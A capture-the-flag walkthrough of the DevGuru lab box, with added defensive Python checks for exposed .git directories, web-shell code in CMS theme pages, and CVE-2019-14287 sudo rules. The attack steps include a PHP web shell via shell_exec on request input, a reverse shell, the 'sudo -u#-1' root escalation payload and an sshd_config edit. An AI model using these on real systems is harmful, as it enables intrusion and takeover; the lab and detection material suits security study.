Information gathering
Kali IP
Target IP
First, we scan the target for open ports:
nmap -A -p- 192.168.20.143
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-18 10:41 CST
Nmap scan report for bogon (192.168.20.143)
Host is up (0.00044s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 2a:46:e8:2b:01:ff:57:58:7a:5f:25:a4:d6:f2:89:8e (RSA)
|   256 08:79:93:9c:e3:b4:a4:be:80:ad:61:9d:d3:88:d2:84 (ECDSA)
|_  256 9c:f9:88:d4:33:77:06:4e:d9:7c:39:17:3e:07:9c:bd (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: DevGuru
| http-git:
|   192.168.20.143:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Last commit message: first commit
|     Remotes:
|       http://devguru.local:8585/frank/devguru-website.git
|_    Project type: PHP application (guessed from .gitignore)
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corp - DevGuru
8585/tcp open  unknown
| fingerprint-strings:
|   GenericLines:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=3fa58b0407bb4cfd; Path=/; HttpOnly
|     Set-Cookie: _csrf=1i6eRR0jsBy2m3oVLV7XjbmTO3Y6MTYzOTc5NTMyOTAyODgyNzUyOQ; Path=/; Expires=Sun, 19 Dec 2021 02:42:09 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Sat, 18 Dec 2021 02:42:09 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title> Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|     <meta name="description" content="Gitea (Git with a cup of tea) is a painless
|   HTTPOptions:
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=e9eacdab4eb43047; Path=/; HttpOnly
|     Set-Cookie: _csrf=YyIv1BjKfPG8puskKPj8fZUT62c6MTYzOTc5NTMyOTA0MjA2MDQ2Nw; Path=/; Expires=Sun, 19 Dec 2021 02:42:09 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Sat, 18 Dec 2021 02:42:09 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Page Not Found - Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|_    <meta name="description" content="Gitea (Git with a c
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 00:0C:29:49:16:E8 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.44 ms bogon (192.168.20.143)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.30 seconds
Ports 22, 80 and 8585 are open, and the kernel is identified as Linux 4.x or 5.x. Port 80 reveals a hostname (devguru.local), so we map that hostname to the IP address manually.
Looking at the nmap results again, there is a .git directory. That immediately suggests dumping the repository; gitdump is the recommended tool, but I am used to GitHacker, so that is what I use here.
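Serving the .git directory is what hands over the site's source (and, shortly, its database credentials), and a defender can catch both the exposure and the probing for it in the web server's access log. The following is an added example, not part of the original writeup: it flags requests whose path contains a version-control metadata directory in Apache combined-format log lines, generalising from .git to other VCS directories; the log lines, client addresses and directory list are constructed assumptions.

```python
import re
from collections import defaultdict
from typing import Optional

# Apache combined log: client ident user [time] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Version-control metadata directories that should never be served (assumed list)
VCS_DIRS = (".git", ".svn", ".hg", ".bzr")

def vcs_path(path: str) -> Optional[str]:
    """Return the VCS directory name if a path segment is one, else None.
    Matches whole segments only, so /static/.gitignore is not a hit."""
    for seg in path.split("?", 1)[0].split("/"):
        if seg in VCS_DIRS:
            return seg
    return None

def scan_access_log(lines):
    """Return (findings, per_client). A finding is (ip, path, status).
    200 means the metadata really was served; 403/404 still shows someone
    probing for it, so both are reported and the caller can filter."""
    findings, per_client = [], defaultdict(int)
    for line in lines:
        m = LOG_RE.match(line)
        if m and vcs_path(m["path"]):
            findings.append((m["ip"], m["path"], int(m["status"])))
            per_client[m["ip"]] += 1
    return findings, dict(per_client)

# Constructed sample log lines, not real traffic
SAMPLE_LOG = [
    '192.168.20.50 - - [18/Dec/2021:10:41:07 +0800] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.20.50 - - [18/Dec/2021:10:41:09 +0800] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "Mozilla/5.0"',
    '192.168.20.50 - - [18/Dec/2021:10:41:09 +0800] "GET /.git/config HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '192.168.20.50 - - [18/Dec/2021:10:41:10 +0800] "GET /.git/objects/ HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
    '192.168.20.77 - - [18/Dec/2021:10:42:00 +0800] "GET /static/.gitignore HTTP/1.1" 200 64 "-" "curl/7.74"',
    '192.168.20.77 - - [18/Dec/2021:10:42:01 +0800] "GET /.svn/entries HTTP/1.1" 404 196 "-" "curl/7.74"',
]

if __name__ == "__main__":
    found, counts = scan_access_log(SAMPLE_LOG)
    for ip, path, status in found:
        print(f"{ip} requested {path} -> {status}")
    print("requests per client:", counts)
```

A 200 on /.git/HEAD is the condition nmap's http-git script reported above; blocking the directory in the server configuration removes it, and the log check shows who looked for it anyway.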
Let's see what information the Git repository holds.
First, README.md.
A quick look shows it is just the installation guide and the minimum installation requirements.
Next, the config directory, to see if it holds anything useful.
First, app.php.
It only stores some general settings; nothing useful.
Then database.php.
Here we unexpectedly find the MySQL username and password.
We also find adminer.php in the repository folder, so let's look up what it is.
A search shows it is a database management tool.
Then we go to port 80 and reach its login page.
We log in with the MySQL username and password.
Login successful.
The scan also found something that looks like the backend login address.
Testing confirms it.
Now let's look through the database for usernames and passwords.
We find a username and password.
Then let's check the backend groups.
There is only one, with the permissions of the site owners group; all users belong to that single owners group.
We search for an online hashing tool and find the following link:
https://www.jisuan.mobi/p163u3BN66Hm6JWx.html
We keep the default Rounds and set the password to 123456.
Then we change the value in the database.
Then we log in, and successfully reach the backend.
Exploitation
The CMS tab offers a code editor, so we construct our own malicious code.
Code:
function onStart()
{
    $this->page['myVar'] = shell_exec($_REQUEST['cmd']);
}
Add the output in the Markup tab.
Then we save and try to run commands from the front end.
It works. We create a reverse shell and save it as shell.php.
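The onStart() handler above is a one-line change to a theme page that turns it into a web shell, and no page handler in this site needs shell functions at all. The following is an added example, not from the original writeup: it splits an October-style theme file into its config, PHP and Twig sections and reports dangerous PHP calls in the code section; the "==" section format, the function list and both sample pages are assumptions constructed for the example.

```python
import re

# PHP functions that pass strings to a shell or evaluate code; a CMS page's
# onStart() handler has no legitimate need for them (assumption: this list).
DANGEROUS_CALLS = ("shell_exec", "exec", "system", "passthru", "popen", "proc_open", "eval")
REQUEST_SOURCES = ("$_REQUEST", "$_GET", "$_POST", "$_COOKIE")  # attacker-controlled input
CALL_RE = re.compile(r"\b(" + "|".join(DANGEROUS_CALLS) + r")\s*\(")

def split_sections(page_text):
    """Assumed October-style theme file: INI config, optional PHP code and Twig
    markup separated by lines of '=='. Returns (config, php, markup)."""
    parts = re.split(r"^==\s*$", page_text, flags=re.MULTILINE)
    if len(parts) == 3:
        return parts[0], parts[1], parts[2]
    if len(parts) == 2:
        return parts[0], "", parts[1]
    return page_text, "", ""

def audit_page(page_text):
    """Return (function, line_in_php_section, tainted) for each dangerous call;
    tainted is True when a request superglobal sits on the same line."""
    _, php, _ = split_sections(page_text)
    findings = []
    for n, line in enumerate(php.strip("\n").splitlines(), 1):
        for m in CALL_RE.finditer(line):
            tainted = any(src in line for src in REQUEST_SOURCES)
            findings.append((m.group(1), n, tainted))
    return findings

# Constructed samples: the backdoored page from the writeup beside a clean one
BACKDOORED = """title = "Home"
==
<?php
function onStart() { $this->page['myVar'] = shell_exec($_REQUEST['cmd']); }
?>
==
<p>{{ myVar }}</p>
"""
CLEAN = """title = "About"
==
<?php
function onStart() { $this->page['year'] = date('Y'); }
?>
==
<h1>About {{ year }}</h1>
"""

if __name__ == "__main__":
    for name, text in (("home.htm", BACKDOORED), ("about.htm", CLEAN)):
        print(name, audit_page(text) or "clean")
```

Run over a theme directory (or as a pre-commit check on the repository the site is deployed from), this catches the backdoor the moment it is saved rather than when the first command runs.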
Then we start a simple web server on Kali and upload the shell to the target.
Start a listener with msfconsole.
Open the shell in the browser.
Connection established.
Check the current privileges.
Use Python to spawn an interactive shell:
python3 -c "import pty;pty.spawn('/bin/bash')"   # the target has no python2, so use python3
Looking around, we find a backup file in /var and download it to inspect.
Let's look at app.ini.bak.
It holds another set of database credentials. Logging in with them, we find another username and password, but the password is hashed, so we focus on this hint.
Since I could not find a way to recover this hash, we change the hashing algorithm and replace the hash.
This site also runs something on port 8585; we visit it, try to log in, and succeed.
Looking around, we find a place where we can enter input.
Set up a listener in msf.
Generate the malicious code.
Upload the malicious code.
Next, find a way to trigger it.
We find that files in the repository can be edited; adding a few blank lines is enough to trigger it.
Check the privileges.
We now have regular user privileges.
Privilege escalation
Run sudo -l to check which commands may be run with sudo.
The output shows:
With a configuration like this, and a sudo version lower than 1.8.27, we conclude CVE-2019-14287 is present and use the payload to escalate:
sudo -u#-1 sqlite3 /dev/null '.shell /bin/bash'
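The rule the payload above relies on is the "(ALL, !root)" run-as pattern that CVE-2019-14287 abuses on sudo releases before 1.8.28, where it was fixed. The following is an added example, not from the original writeup: it parses a sudoers excerpt for such rules and combines that with the installed sudo version to decide whether a host is exposed; the sudoers excerpt, including the user frank and the sqlite3 command, is constructed for the example and is not the box's real file.

```python
import re

FIXED_IN = (1, 8, 28, 0)  # CVE-2019-14287 was fixed in sudo 1.8.28

# user HOST=(runas_users[:runas_groups]) [TAG:] commands
RULE_RE = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")

def parse_version(v):
    """Turn '1.8.21p2' into a comparable tuple (1, 8, 21, 2); no patch level -> 0."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", v)
    if not m:
        raise ValueError(f"unrecognised sudo version: {v!r}")
    major, minor, rel, patch = m.groups()
    return (int(major), int(minor), int(rel), int(patch or 0))

def negated_root_rules(sudoers_text):
    """Return (user, commands) for rules whose run-as list is ALL minus root,
    e.g. '(ALL, !root)'. On an unpatched sudo, 'sudo -u#-1' turns such a rule
    into plain root access, which is exactly what CVE-2019-14287 describes."""
    hits = []
    for raw in sudoers_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        users = [u.strip() for u in m["runas"].split(":", 1)[0].split(",")]
        if "ALL" in users and any(u in ("!root", "!#0") for u in users):
            hits.append((m["who"], m["cmds"].strip()))
    return hits

def exposed_to_cve_2019_14287(sudo_version, sudoers_text):
    """True only when sudo predates the fix AND a '!root' rule exists."""
    return parse_version(sudo_version) < FIXED_IN and bool(negated_root_rules(sudoers_text))

# Constructed sudoers excerpt modelled on the rule the payload above relies on
SAMPLE_SUDOERS = """# /etc/sudoers (sample, not the box's real file)
Defaults env_reset
root    ALL=(ALL:ALL) ALL
frank   ALL=(ALL, !root) NOPASSWD: /usr/bin/sqlite3
www-data ALL=(ALL) NOPASSWD: /usr/sbin/service apache2 restart
"""

if __name__ == "__main__":
    for ver in ("1.8.21p2", "1.8.28", "1.9.5p2"):
        print(ver, "exposed" if exposed_to_cve_2019_14287(ver, SAMPLE_SUDOERS) else "ok")
```

Either half of the condition removes the exposure: upgrading sudo, or rewriting the rule to name the users frank may actually run as instead of excluding root from ALL.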
Root obtained.
sed -i "s/PasswordAuthentication no/PasswordAuthentication yes/" /etc/ssh/sshd_config
SSH connection successful.